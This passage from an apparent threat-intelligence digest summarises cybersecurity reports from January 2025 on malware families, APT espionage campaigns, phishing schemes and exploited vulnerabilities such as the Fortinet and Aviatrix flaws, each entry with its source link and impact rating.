Summary:: Any.run researcher have observed an increase in North Korean cyber espionage campaigns using fake job interview tactics to distribute malware. There are two new malware such as BeaverTail and InvisibleFerret being distributed as a part of this campaign. This campaign also known as Contagious Interview or DevPopper which targets individuals in the tech, financial and cryptocurrency sector. BeaverTail malware is an initial malware that downloads custom python environment and deploys InvisibleFerret. The InvisibleFerret operates sliently without leaving any traces or logs.

Source: https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/

Intel Source:: Seqrite

Intel Name:: SilentLynx_APT_Targets_Kyrgyzstan

Date of Scan:: 2025-01-22

Impact:: LOW

Summary:: Researchers from Seqrite Labs have uncovered two campaigns conducted by threat actor called Silent Lynx which targets organisation in Eastern Europe and Central Aisa. This group focuses on entities such as government think tanks, banking sectors and economic decision-making bodies. The attackers are targeting Kyrgyzstan in their recent campaigns. First campaign is related to National Bank of the Kyrgyz Republic while the second campaign targets the Ministry of Finance of Kyrgyzstan. Both the campaigns start with phishing emails which contains the RAR file attachment with fake document to distract the victim.

Source: https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/

Intel Source:: Cyble

Intel Name:: Critical_Fortinet_Zero_Day_CVE_2024_55591

Date of Scan:: 2025-01-22

Impact:: LOW

Summary:: Researchers at Cyble have observed a major zero-day vulnerability, CVE-2024-55591, in the FortiOS and FortiProxy products, which attackers are actively exploiting to get superadmin privileges. This authentication bypass vulnerability, which has a CVSSv3 score of 9.6, exploits flaws in the Node.js WebSocket module, allowing unauthorized access to administrative services.

Source: https://cyble.com/blog/cve-2024-55591-the-fortinet-flaw-putting-critical-systems-at-risk/

Intel Source:: Zscaler ThreatLabz

Intel Name:: Raspberry_Robin_Update_Exploits_CVE_2024_38196

Date of Scan:: 2025-01-21

Impact:: LOW

Summary:: Raspberry Robin, a malware strain, has recently been updated to include a privilege escalation exploit targeting CVE-2024-38196. This vulnerability allows attackers to elevate their privileges on affected systems, potentially enabling them to gain unauthorized access or perform malicious actions with elevated permissions.

Source: https://x.com/Threatlabz/status/1879956781360976155

Intel Source:: CERT-AGID

Intel Name:: Phishing_Campaign_Targets_Financial_Data

Date of Scan:: 2025-01-21

Impact:: LOW

Summary:: Researchers from CERT-AGID have uncovered an ongoing phishing campaign targeting individuals by impersonating Ministry of Health. In this campaign, the attackers use the Ministry’s logo and name in their emails to lure victims into providing sensitive information by claiming a refund of €265.67 from the National Health Service and contain a link that redirect the recipients to a fake page where they are asked to enter their personal details and credit card information. Victims are then asked to re-enter their card information on a second page which increase the chances of attackers to collect additional data.

Source: https://cert-agid.gov.it/news/false-comunicazioni-del-ministero-della-salute-sfruttate-per-phishing-finanziario/

Intel Source:: Walmart Global Tech

Intel Name:: Return_of_QBot

Date of Scan:: 2025-01-21

Impact:: LOW

Summary:: QBot also known as Pinkslipbot is a malware which has been active since 2007. Initially, It started as banking trojan that steal financial information but now has become a flexible tool for stealing data and distributing other malware through C2 servers. Law enforcement agencies has disrupted QBot’s operation in May 2024 but recent signs indicate that the operators are active again. Moreover, this group has developed new malware called Backconnect which is linked to ransomware operators specially BlackBasta.

Source: https://medium.com/walmartglobaltech/qbot-is-back-connect-2d774052369f

Intel Source:: Cyfirma

Intel Name:: Nnice_Ransomware_Targeting_Windows

Date of Scan:: 2025-01-21

Impact:: MEDIUM

Summary:: CYFIRMA researchers have identified a new ransomware strain called Nnice, which is targeting Windows systems. This ransomware uses advanced encryption techniques, appending the .xdddd extension to encrypted files. It also changes the system wallpaper and leaves a ransom note ("Readme.txt") with recovery instructions.

Source: https://www.cyfirma.com/research/nnice-ransomware/

Intel Source:: Cyble

Intel Name:: Sliver_Implant_Targets_German_Entities

Date of Scan:: 2025-01-21

Impact:: LOW

Summary:: Researchers at Cyble have found a sophisticated hack targeting German entities, which used DLL sideloading, proxying techniques, and the Sliver framework. The attack begins with a misleading LNK file placed in an archive, which, when executed, initiates a chain of events involving a genuine program (wksprt.exe) that sideloads a malicious DLL.

Source: https://cyble.com/blog/sliver-implant-targets-german-entities-with-dll-sideloading-and-proxying-techniques/

Intel Source:: Trend Micro

Intel Name:: IoT_Botnet_Targets_Global_Networks

Date of Scan:: 2025-01-19

Impact:: LOW

Summary:: Researchers at Trend Micro have observed large-scale DDoS attacks orchestrated by an IoT botnet, especially targeting enterprises in Japan but also abroad. The botnet, which includes malware variants inspired from Mirai and Bashlite, attacks IoT devices such as wireless routers and IP cameras by exploiting vulnerabilities and weak passwords. These infected devices communicate with command-and-control servers, launching various DDoS attacks, upgrading malware, and enabling proxy services.

Source: https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html

Intel Source:: sophos

Intel Name:: SEO_Manipulation_by_Gootloader

Date of Scan:: 2025-01-19

Impact:: LOW

Summary:: Researchers at Sophos have recreated the server-side activities of the Gootloader virus, which is an SEO-driven threat that uses infected WordPress sites to entice victims. Gootloader uses hijacked Google search results to send users to legitimate sites that have been altered to display simulated message boards with malware links embedded in seemingly relevant talks.

Source: https://news.sophos.com/en-us/2025/01/16/gootloader-inside-out/

Intel Source:: Secureworks

Intel Name:: Nickel_Tapestry_Fraud_Connections

Date of Scan:: 2025-01-18

Impact:: LOW

Summary:: Researchers at Secureworks Counter Threat Unit have discovered linkages between North Korean IT worker schemes and a 2016 crowdfunding scam. The schemes, attributed to the NICKEL TAPESTRY threat group, included front firms such as Yanbian Silverstar in China and Volasys Silver Star in Russia, both of which were sanctioned by the United States Department of Treasury in 2018.

Source: https://www.secureworks.com/blog/nickel-tapestry-infrastructure-associated-with-crowdfunding-scheme

Intel Source:: Arctic Wolf

Intel Name:: FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day

Date of Scan:: 2025-01-18

Impact:: MEDIUM

Summary:: Arctic Wolf Labs researchers have observed a recent campaign targeting Fortinet FortiGate firewalls with exposed management interfaces on the public internet. Threat actors gained unauthorized access, creating new accounts, modifying configurations, and extracting credentials. While the initial access vector remains unconfirmed, there is high confidence that a zero-day vulnerability is involved.

Source: https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/

Intel Source:: GuidePoint

Intel Name:: RansomHub_Affiliate_Uses_Python_Based_Backdoor

Date of Scan:: 2025-01-18

Impact:: MEDIUM

Summary:: GuidePoint security researchers have uncovered Python-based backdoor being used by a threat actor to maintain access to compromised devices. The attack starts with initial access through fake malware updates which often impersonate legitimate software updates to trick users and after 20 minutes of initial infection, the Python backdoor is installed on the compromised device. The attackers then use RDP to spread the infection to the other systems in the network and deploy more Python backdoors. The attackers ultimately leverage their access to deploy RansomHub ransomware across the network for encrypting the data.

Source: https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/

Intel Source:: Trend Micro

Intel Name:: Analyzing_a_Web_Shell_Intrusion

Date of Scan:: 2025-01-18

Impact:: LOW

Summary:: Trend Micro researchers investigated a customer incident involving suspicious activity detected by endpoint sensors. The IIS worker (w3wp.exe) on a public-facing server was compromised when an attacker uploaded a web shell, which was initially unrestricted. This allowed the attacker to create a new account and modify an existing user's password. The attacker also used an encoded PowerShell command to establish a reverse TCP shell for command-and-control communication. Further investigation revealed multiple payloads downloaded to the system, and the attacker’s initial access was traced through web server requests interacting with the web shell.

Source: https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro--managed-xd.html

Intel Source:: PaloAlto

Intel Name:: KongTuke_Campaign_Exploits_BOINC

Date of Scan:: 2025-01-17

Impact:: LOW

Summary:: KongTuke is a malicious campaign involving injected scripts that create fake "verify you are human" pages on websites. These pages trick users into executing a malicious PowerShell script by copying it into their clipboard and following instructions to run it. The script leads to an infection that exploits BOINC (Berkeley Open Infrastructure for Network Computing), a legitimate platform often used by research organizations. The attackers set up rogue BOINC project servers with domains like rosettahome[.]cn and rosettahome[.]top, attempting to disguise them as legitimate rosetta@home servers. However, these servers are unrelated to rosetta@home and are used for malicious purposes in the campaign.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-13-IOCs-for-Kongtuke-activity.txt

Intel Source:: Microsoft

Intel Name:: Star_Blizzard_Targets_WhatsApp_Accounts

Date of Scan:: 2025-01-17

Impact:: MEDIUM

Summary:: Microsoft researchers have identified that Russian threat actor known as Star Blizzard is using new tactic to target victims through WhatsApp. This group often targets government officials, diplomats, defense policy researchers and those aiding Ukraine in the war with Russia. In this campaign, they leverage spear-phishing emails impersonating a U.S. government official that contain QR code which encourage users to join WhatsApp group supporting Ukraine NGOs. However, the QR code is non- functional then user responds and attackers send another email containing a link which redirects the target to a webpage where they are asked to scan a fake QR code linked to WhatsApp account to attacker’s device. This allows the attacker to access the victim’s WhatsApp messages and potentially steal data using browser plugins.

Source: https://www.microsoft.com/en-us/security/blog/2025/01/16/new-star-blizzard-spear-phishing-campaign-targets-whatsapp-accounts/

Intel Source:: WIZ

Intel Name:: Exploitation_of_Aviatrix_Controller_Vulnerability

Date of Scan:: 2025-01-17

Impact:: MEDIUM

Summary:: A critical vulnerability CVE-2024-50603 has been identified that affects the Aviatrix Controller which allow attackers to execute commands on the system remotely without authentication. This vulnerability happens because the software does not properly handle user input in its API. The impact of this vulnerability is severe when the Aviatrix Controller is deployed in AWS cloud environments because it can also give attackers high privilege accesses. Researchers also observed that attackers exploiting this flaw in the wild to mine cryptocurrency and install backdoors.

Source: https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603

Intel Source:: Fortinet

Intel Name:: Deep_Dive_Into_a_Linux_Rootkit_Malware

Date of Scan:: 2025-01-17

Impact:: LOW

Summary:: Fortinet researchers have analyzed rootkit malware that infects Linux systems using zero-day exploit. The malware has two components - kernel module and a user-space program. The kernel module creates hidden communication channel by using Linux system file and hijack network traffic. It establishes a secure session and processes encrypted commands which enable the attacker to restart processes or execute system commands with root privileges. The user-space program pretends to be normal but secretly runs the attacker's commands in the background coordinating with the kernel module.

Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware

Intel Source:: Acronis

Intel Name:: SharpRhino_A_New_RAT_Malware

Date of Scan:: 2025-01-16

Impact:: LOW

Summary:: Researchers at Acronis have discovered a new RAT called SharpRhino developed by Hunters International which is a RaaS group. This malware first appeared in 2024 and is designed to provide remote control over compromised machine. The malware is delivered to victims as a fake legitimate software installer using Nullsoft Scriptable Install System (NSIS). When the installer runs, it installs a PowerShell script that includes [.]net payloads which enable the malware to communicate with C2 server, allowing attackers to execute commands on the compromised machine.

Source: https://www.acronis.com/en-us/cyber-protection-center/posts/sharprhino-an-old-new-threat/

Intel Source:: Sekoia

Intel Name:: Double_Tap_Campaign

Date of Scan:: 2025-01-16

Impact:: MEDIUM

Summary:: Researchers from Sekoia have uncovered a cyber espionage campaign called Double Tap conducted by UAC-0063, a Russia-linked hacking group associated with APT28 (GRU). The campaign involved legitimate document from Kazakhstan's Ministry of Foreign Affairs by adding malicious Word documents to target Central Aisa. The attacker uses macro embedded word document to which install HATVIBE, a backdoor that downloads and executes additional payloads and a more advanced Python-based backdoor called CHERRYSPY. The purpose of this operation is to gather intelligence on Kazakhstan’s diplomatic relations and geopolitical activities such as its economic partnerships with Western countries and China and its role in the Middle Corridor trade route in Central Aisa.

Source: https://blog.sekoia.io/double-tap-campaign-russia-nexus-apt-possibly-related-to-apt28-conducts-cyber-espionage-on-central-asia-and-kazakhstan-diplomatic-relations/

Intel Source:: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-10-IOCs-for-CVE-2017-0199-XLS-infection-chain.txt

Intel Name:: CVE_2017_0199_Exploit_Campaign_Targets_with_RATs

Date of Scan:: 2025-01-15

Impact:: LOW

Summary:: Criminals have been exploiting CVE-2017-0199 through malicious Microsoft Office documents for years, targeting outdated systems. Despite this, new exploit samples continue to appear regularly. A campaign active since 2023 or earlier primarily distributes DBatLoader/GuLoader-style malware, which is delivered via a .NET DLL embedded in an image using steganography and reversed base64 encoding. Recent variations of the malware have been linked to remote access tools (RATs) like AgentTelsa, Formbook (XLoader), LokiBot, and Remcos.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-10-IOCs-for-CVE-2017-0199-XLS-infection-chain.txt

Intel Source:: CERT-AGID

Intel Name:: Lumma_Stealer_Uses_Fake_CAPTCHAs_to_Spread_Malware

Date of Scan:: 2025-01-13

Impact:: LOW

Summary:: Lumma Stealer malware is using fake CAPTCHA challenges to deceive users into executing malicious scripts. In a campaign observed by CERT-AGID in October 2024, victims were misled by a fake CAPTCHA warning about a security issue with their GitHub repositories. Following the CAPTCHA's instructions led to executing a PowerShell script that infected systems with Lumma Stealer. Additionally, an Italian domain running outdated WordPress was compromised to spread the malware through a hidden Base64-encoded JavaScript that generated a fake CAPTCHA for Windows users. Executing the script triggered the malware download and installation.

Source: https://cert-agid.gov.it/news/analisi-di-una-campagna-lumma-stealer-con-falso-captcha-condotta-attraverso-domino-italiano-compromesso/

Intel Source:: CheckPoint

Intel Name:: FunkSec_Ransomware_Group

Date of Scan:: 2025-01-13

Impact:: LOW

Summary:: Checkpoint researchers have uncovered a new ransomware group called FunkSec that first emerged in 2024 and operates as a Ransomware-as-a-Service (RaaS) group. This group has compromised 85 victims in just one month activity. They do combine activity of cybercrime and hacktivism which makes unclear their motives. They employ on double extortion tactics where they steal sensitive data and encrypt victims’ files for demanding a ransom to restore access. Their operations are run by inexperienced attackers by leveraging AI tool to develop their malware. They target organisations in India and the U.S. that often connecting their attacks to political causes like the Free Palestine movement.

Source: https://research.checkpoint.com/2025/funksec-alleged-top-ransomware-group-powered-by-ai/

Intel Source:: Trend Micro

Intel Name:: Malware_Spread_via_Fake_Installers_on_Social_Media

Date of Scan:: 2025-01-12

Impact:: LOW

Summary:: Researchers at Trend Micro have observed the growing threat of attackers using platforms like YouTube and social media to share links for fake installers that lead to malicious sites. These malicious downloads are often hosted on reputable services like Mediafire and Mega.nz to evade detection. Many of these downloads are password-protected and encoded, making them difficult for security tools to analyze. Once installed, the malware steals sensitive data, including web browser credentials. It highlights how attackers exploit piracy and pose as legitimate software guides on YouTube to trick users into clicking harmful links, ultimately compromising their devices and promoting a culture of theft.

Source: https://www.trendmicro.com/en_us/research/25/a/how-cracks-and-installers-bring-malware-to-your-device.html

Intel Source:: Huntress

Intel Name:: RedCurl_Cyberespionage_in_Canada

Date of Scan:: 2025-01-12

Impact:: MEDIUM

Summary:: Researchers at Huntress have discovered cyberespionage activity targeting various Canadian organizations, which they connect to the APT group RedCurl (also known as Earth Kapre or Red Wolf). RedCurl, which has been active since at least November 2023, uses new and developing strategies to get access to and exfiltrate sensitive material, such as emails and company records, while avoiding detection.

Source: https://www.huntress.com/blog/the-hunt-for-redcurl-2

Intel Source:: Checkpoint

Intel Name:: Banshee_MacOS_Stealer

Date of Scan:: 2025-01-12

Impact:: LOW

Summary:: Researchers at Check Point have identified a MacOS malware called Banshee which targets MacOS users to steal sensitive information such as browser credentials, cryptocurrency wallet data and files. It first appeared in July 2024 and is operated by Russian speaking cybercriminals as a stealer-as-a-service on platforms like Telegram and dark web forums (XSS and Exploit). The advanced version of this malware adds string encryption instead of plain text which has been copied from Apple’s XProtect antivirus. It is distributed through phishing emails and malicious GitHub repositories. This malware is capable of stealing data from popular browsers like Chrome, Brave, Edge, and Opera, as well as extensions related to cryptocurrency wallets and two-factor authentication tools.

Source: https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/

Intel Source:: Cyfirma

Intel Name:: TA397_Bitter_APT_Espionage_Campaigns

Date of Scan:: 2025-01-11

Impact:: LOW

Summary:: Researchers at Cyfirma have discovered that TA397, also known as Bitter, is a South Asian cyber espionage group that targets government, energy, telecommunications, defense, and engineering corporations in the EMEA and APAC regions. TA397 uses complex tactics to deliver payloads, including as RAR archives containing alternate data streams (ADS) and decoy files.

Source: https://www.cyfirma.com/research/apt-profile-ta397/

Intel Source:: Cyble

Intel Name:: Hexalocker_Ransomware_V2

Date of Scan:: 2025-01-11

Impact:: MEDIUM

Summary:: Cyble researcher have uncovered a HexaLocker ransomware that first emerged in 2024 with its version 2 update. This version has multiple functionalities that modifies registry keys and creates run entries to ensure the malware executes even after a system reboot. It employs double extortion tactic by exfiltrating sensitive information before encryption and force victims to pay for both data recovery and confidentiality. The ransomware uses advanced ChaCha20 for encrypting file and incorporates the Skuld stealer, which steals browser data, cookies, saved credit card details, login credentials, and cryptocurrency wallet information. The attackers use [.]HexaLockerv2 extension and communicate with the victims through a unique hash instead of the previously used traditional methods.

Source: https://cyble.com/blog/hexalocker-v2-being-proliferated-by-skuld-stealer/

Intel Source:: CrowdStrike

Intel Name:: CrowdStrike_Recruitment_Phishing_Scam

Date of Scan:: 2025-01-11

Impact:: LOW

Summary:: On January 7, 2025, CrowdStrike reported a phishing campaign using its recruitment branding to distribute malware. The attack starts with a phishing email impersonating CrowdStrike's recruitment team, leading victims to a malicious website. There, they are tricked into downloading a fake "employee CRM application," which serves as a downloader for the XMRig cryptominer.

Source: https://www.crowdstrike.com/en-us/blog/recruitment-phishing-scam-imitates-crowdstrike-hiring-process/

Intel Source:: PaloAlto

Intel Name:: HeartCrypt_Malware_Packing_Method_Update

Date of Scan:: 2025-01-10

Impact:: LOW

Summary:: HeartCrypt, a packer-as-a-service (PaaS) for Windows malware, was first identified in February 2024. It hides malware within legitimate packed executable (PE) files to evade detection. Following a December 2024 report on HeartCrypt, recent samples have shown changes in the packing method. The position-independent code (PIC) used for payload generation has been removed from the PE file's resource data. Instead, the malware payload is now stored in two fake BMP image files, each containing XOR-encrypted blocks of data. These blocks are decrypted and combined to form the final malware payload. The extraction process has been updated to handle this new packing technique.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-06-changes-to-HeartCrypt-packed-malware.txt

Intel Source:: ISC.SANS

Intel Name:: Redtail_Advanced_Cryptomining_Malware

Date of Scan:: 2025-01-10

Impact:: LOW

Summary:: Researchers at ISC SANS have discovered a sophisticated cryptomining malware strain called "redtail," which secretly exploits infected systems for unlawful cryptocurrency mining. Redtail, which is active from August to November 2024, uses innovative strategies like as scripts that evaluate CPU architectural compatibility and remove competing miners, ensuring persistence and evasion.

Source: https://isc.sans.edu/diary/rss/31568

Intel Source:: Acronis

Intel Name:: Skuld_Stealer

Date of Scan:: 2025-01-10

Impact:: LOW

Summary:: Researchers from Acronis have uncovered open source-based malware called TMPN stealer also known as Skuld. It first appeared in 2023 and developed by Deathined. The malware is distributed through malicious links and compromised websites targeting user globally. Its primary focus is on stealing information related to Discord used by gamers and cryptocurrency community. This Stealer injects a malicious JavaScript payload into Discord to extract sensitive data such as emails, passwords and user tokens. It also collects information from web browsers, cryptocurrency wallets and local files on the compromised system.

Source: https://www.acronis.com/en-us/cyber-protection-center/posts/tmpn-skuld-stealer-the-dark-side-of-open-source/

Intel Source:: Trend Micro

Intel Name:: Fake_PoC_Exploit_for_LDAPNightmare

Date of Scan:: 2025-01-10

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have discovered an invalid proof-of-concept (PoC) attack for CVE-2024-49113 (LDAPNightmare) being exploited to transmit information-stealing malware. This vulnerability, a denial-of-service weakness in Microsoft LDAP, was addressed in December 2024, along with CVE-2024-49112, a remote code execution bug. The malicious repository, masquerading as a valid Python-based PoC, replaced the original files with a UPX-packed executable (poc.exe), posing serious threats to security researchers and companies.

Source: https://www.trendmicro.com/en_us/research/25/a/information-stealer-masquerades-as-ldapnightmare-poc-exploit.html

Intel Source:: TRAC Labs

Intel Name:: PEAKLIGHT_Advanced_Malware_Campaign

Date of Scan:: 2025-01-10

Impact:: LOW

Summary:: Researchers at TRAC Labs have discovered an advanced malware campaign known as PEAKLIGHT, which used obfuscated PowerShell-based tactics to deploy infostealers via a malware-as-a-service architecture. Mandiant first identified the attack, which starts with a Microsoft Shortcut File (LNK) linked to a content delivery network hosting a JavaScript dropper that runs a PowerShell downloader script.

Source: https://medium.com/trac-labs/peaklight-illuminating-the-shadows-02a1bb44885c

Intel Source:: ISC.SANS

Intel Name:: PHP_Server_Exploit_for_Mining_Cryptocurrency

Date of Scan:: 2025-01-09

Impact:: LOW

Summary:: ISC.SANS researchers have observed incidents involving a sophisticated attack where a vulnerable or misconfigured PHP server is exploited to serve as a platform for cryptocurrency mining, specifically using the PacketCrypt (PKTC) algorithm. The chain of events outlined in the investigation starts with a malicious URL targeting a vulnerable PHP server running php-cgi.exe, potentially exposed due to misconfigurations or outdated software, like those affected by the CVE-2024-4577 vulnerability.

Source: https://isc.sans.edu/diary/PacketCrypt+Classic+Cryptocurrency+Miner+on+PHP+Servers/31564/

Intel Source:: XLab

Intel Name:: Evolution_and_Growing_Threat_of_Gayfemboy_Botnet

Date of Scan:: 2025-01-09

Impact:: LOW

Summary:: The Gayfemboy botnet, initially a simple variant of Mirai, evolved significantly after its discovery in February 2024 by XLab. Initially unremarkable, it rapidly progressed by modifying its code, integrating Nday and 0day vulnerabilities, and expanding its attack capabilities. By November 2024, Gayfemboy exploited the 0day vulnerabilities of Four-Faith Industrial Routers, Neterbit routers, and Vimar smart home devices, growing its infection scale to over 15,000 active nodes. XLab's monitoring revealed its unique traits, including regular DDoS attacks against registered domain names. Despite its beginnings as a basic Mirai variant, Gayfemboy transformed into a sophisticated, large-scale botnet with advanced attack capabilities.

Source: https://blog.xlab.qianxin.com/gayfemboy/#ioc

Intel Source:: SOC Radar

Intel Name:: Turla_Cyber_Campaign_Targeting_Pakistan

Date of Scan:: 2025-01-08

Impact:: LOW

Summary:: Turla is a well-known state- sponsored threat group targeting Pakistan’s critical infrastructure that includes energy, telecommunications and government sectors. They use phishing emails and malware deployment to gain unauthorized access to networks and exploit vulnerabilities such as CVE-2022-38028 to infiltrate systems. The attackers use tactics like DLL hijacking to stay hidden in systems and employ strong encryption to secure its communications. The malware not only steals sensitive information but also disrupts the operations of the targeted systems.

Source: https://socradar.io/turla-cyber-campaign-pakistans-critical-infrastructure/

Intel Source:: SOC Radar

Intel Name:: Black_Basta_Deploying_Multiple_Malware

Date of Scan:: 2025-01-08

Impact:: MEDIUM

Summary:: Black Basta is highly advanced ransomware group that targets industries such as healthcare, finance, manufacturing, energy and national security worldwide. They leverage social engineering tactics and malwares like Zbot and DarkGate and custom-made tools to infiltrate systems. They often begin their attack with phishing emails to distract victims from malicious attachment. The group uses MS teams to impersonate IT support staff, using names like Help Desk or Technical Support to trick employees to install remote access tools like AnyDesk, QuickAssist or TeamViewer which the attackers then use to bypass security and deliver malware.

Source: https://socradar.io/black-basta-deploying-zbot-darkgate-bespoke-malware/

Intel Source:: Secure Annex & Keep Aware

Intel Name:: Cyberhaven_Extension_Breach

Date of Scan:: 2025-01-07

Impact:: HIGH

Summary:: On December 24, Cyberhaven, a data loss prevention company, disclosed a breach involving a successful phishing attack on an administrator account for the Google Chrome store. The hacker gained access to an employee's account and published a malicious version (24.10.4) of the Cyberhaven extension. This version included code that could steal authenticated sessions and cookies, sending them to the attacker's domain. Among Cyberhaven's clients are companies like Snowflake, Motorola, Canon, and Reddit. The malicious package was removed within an hour after detection by Cyberhaven's internal security team.

Source: https://secureannex.com/blog/cyberhaven-extension-compromise/ https://keepaware.com/blog/cyberhaven-browser-extension-compromise

Intel Source:: ISC.SANS

Intel Name:: SwaetRAT_Delivery_Through_Python

Date of Scan:: 2025-01-06

Impact:: LOW

Summary:: The Python script analyzed is a multi-stage malware that targets Windows hosts. It uses advanced evasion techniques, including in-memory patching of Windows API functions (`AmsiScanBuffer()` and `EtwEventWrite()`) to avoid detection and logging. The script loads a Base64-encoded .NET assembly, which is executed via reflection. This assembly (SwaetRAT) installs persistence mechanisms by copying itself to specific directories and modifying the registry, ensuring it runs on startup. The malware also creates a shortcut in the Startup folder and connects to a remote C2 server for further control.

Source: https://isc.sans.edu/diary/SwaetRAT+Delivery+Through+Python/31554/

Intel Source:: Socket

Intel Name:: NPM_Campaign_Targets_Ethereum_Developers

Date of Scan:: 2025-01-06

Impact:: LOW

Summary:: Socket researchers have uncovered a malicious campaign targeting Ethereum developers by creating fake npm packages disguised as legitimate Hardhat plugins from the Nomic Foundation. The attackers use fake npm packages with similar names such as @nomicsfoundation/sdk-test and @nomisfoundation/hardhat-configure to trick developers into downloading them. Once installed, these packages steal sensitive data such as private keys, mnemonics, and configuration details by abusing Hardhat’s Runtime Environment (HRE). The stolen data is encrypted using predefined AES key and sent to attacker-controlled servers.

Source: https://socket.dev/blog/malicious-npm-campaign-targets-ethereum-developers

Intel Source:: Securelist

Intel Name:: EAGERBEE_Backdoor_Targets_Middle_East

Date of Scan:: 2025-01-06

Impact:: LOW

Summary:: Researchers at Securelist have discovered the implementation of the EAGERBEE backdoor, which targets ISPs and government agencies in the Middle East, with updated and unique components. These include a service injector, which embeds the backdoor in operating services, as well as previously undocumented plugins that allow for malicious actions such as payload distribution, file system exploration, and command execution.

Source: https://securelist.com/eagerbee-backdoor/115175/

Intel Source:: Cyfirma

Intel Name:: NonEuclid_Remote_Access_Trojan

Date of Scan:: 2025-01-06

Impact:: LOW

Summary:: Researcher from Cyfirma have identified a malware called Nonlucid Remote Access Trojan which allows attackers to gain unauthorized remote access and control over a victim’s machine. It is capable of bypassing antivirus programs, escalating privileges, and encrypting critical files to deploy ransomware. The tutorial of this malware is available on underground forums, Discord and Youtube. The malware maintains active communication between the compromised device and the attacker by using a client socket. If the connection is lost, it keeps trying to reconnect to ensure that the attacker can maintain control over the victim's device for as long as possible.

Source: https://www.cyfirma.com/research/noneclid-rat/

Intel Source:: Cyfirma

Intel Name:: Remote_Template_Injection_Attack

Date of Scan:: 2025-01-06

Impact:: LOW

Summary:: Researchers at CYFIRMA have discovered an advanced attack vector known as Remote Template Injection, which uses Microsoft Word's template functionality to deliver malicious payloads. This approach, commonly used by advanced persistent threats (APTs) such as FIN7, leverages confidence by embedding links to harmful templates in Word documents. These decoy documents avoid standard defenses like email gateways and endpoint detection systems because they appear harmless until they download and run malicious macros from remote servers.

Source: https://www.cyfirma.com/research/living-off-the-land-the-mechanics-of-remote-template-injection-attack/

Intel Source:: Reversinglabs

Intel Name:: Malicious_Campaigns_Proliferate_from_VSCode_to_NPM

Date of Scan:: 2025-01-05

Impact:: LOW

Summary:: ReversingLabs researchers have observed the increase in malicious activity related to VSCode Marketplace. . Initially attackers used npm packages to deliver malicious code into VSCode extension. In late 2024, a campaign where attackers used malicious VSCode extensions that move to npm with a package called etherscancontracthandler. Malicious npm packages not only risks for Node.js applications but can also compromise other npm packages and VSCode extensions that can affect local development environments. This campaign is targeting developers, crypto community and later impersonated apps like Zoom by using reviews and inflated install counts to appear legitimate.

Source: https://www.reversinglabs.com/blog/a-new-playground-malicious-campaigns-proliferate-from-vscode-to-npm

Intel Source:: SOC Radar

Intel Name:: Water_Makara_Campaign

Date of Scan:: 2025-01-05

Impact:: LOW

Summary:: The Water Makara campaign targets Brazilian organizations such as banking, national security, retail, and manufacturing. The attackers use spear-phishing techniques to trick victims into opening malicious links or attachments which deliver the Astaroth malware. Once the malware is active, it steals sensitive information like login credentials and personal data, enabling cybercriminals to infiltrate systems further.

Source: https://socradar.io/water-makara-campaign-a-spear-phishing-attack-on-brazilian-enterprises/

Intel Source:: Securelist

Intel Name:: Evolving_Infection_Chains_by_Lazarus

Date of Scan:: 2025-01-05

Impact:: MEDIUM

Summary:: Researchers from SecureList have discovered the Lazarus group extending its infection chain by merging old and new malware in its DeathNote campaign, also known as "Operation DreamJob." The gang targets people in fields such as defense, aerospace, and cryptocurrencies, and uses false job postings to transmit malicious archive files.

Source: https://securelist.com/lazarus-new-malware/115059/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: APT_C_26_Lazarus_Attack_Using_Weaponized_IPMsg

Date of Scan:: 2025-01-05

Impact:: MEDIUM

Summary:: Researchers at 360 Advanced Threat Research Institute have discovered that the Lazarus group has weaponized the IPMsg installer by embedding malicious code within it. When the user runs the installer, it simultaneously executes the legitimate IPMsg version to deceive the user, while activating a malicious DLL in memory. This DLL connects to a remote server to download a backdoor and steal sensitive information. This attack highlights Lazarus' social engineering tactics, which trick users into executing harmful programs.

Source: https://mp.weixin.qq.com/s/XuaMRmZSomKFoaX7XrqpYA

Intel Source:: ISC.SANS

Intel Name:: Phishing_for_Banking_Information

Date of Scan:: 2025-01-05

Impact:: LOW

Summary:: Researchers from ISC.SANS have discovered a significant rise in phishing scams targeting banking information during the holiday season, including credit card verification, parcel shipping, and prize prizes. A recent case involves a bogus text message posing as a Bank of Montreal (BMO) alert and sent from an unidentified area code rather than BMO's actual number, "266898."

Source: https://isc.sans.edu/diary/Phishing+for+Banking+Information/31548/

Intel Source:: CERT-UA

Intel Name:: UAC_0125_Tor_Backdoor_Malware_Attack

Date of Scan:: 2025-01-05

Impact:: LOW

Summary:: Researchers from CERT-UA have discovered an attack campaign known as UAC-0125 that used fraudulent web resources simulating the "Army+" program to transmit malware. These websites, hosted by Cloudflare Workers, direct users to download a malicious installer called "ArmyPlusInstaller-v.0.10.23722.exe," which was created using NSIS. This installer includes a.NET decoy file, Python interpreter files, Tor components, and a PowerShell script that configures an OpenSSH server, generates and exfiltrates RSA private keys, and establishes covert SSH access through Tor.

Source: https://cert.gov.ua/article/6281701

Intel Source:: Picussecurity

Intel Name:: A_Deep_Dive_into_Kimsuky_Group

Date of Scan:: 2025-01-05

Impact:: MEDIUM

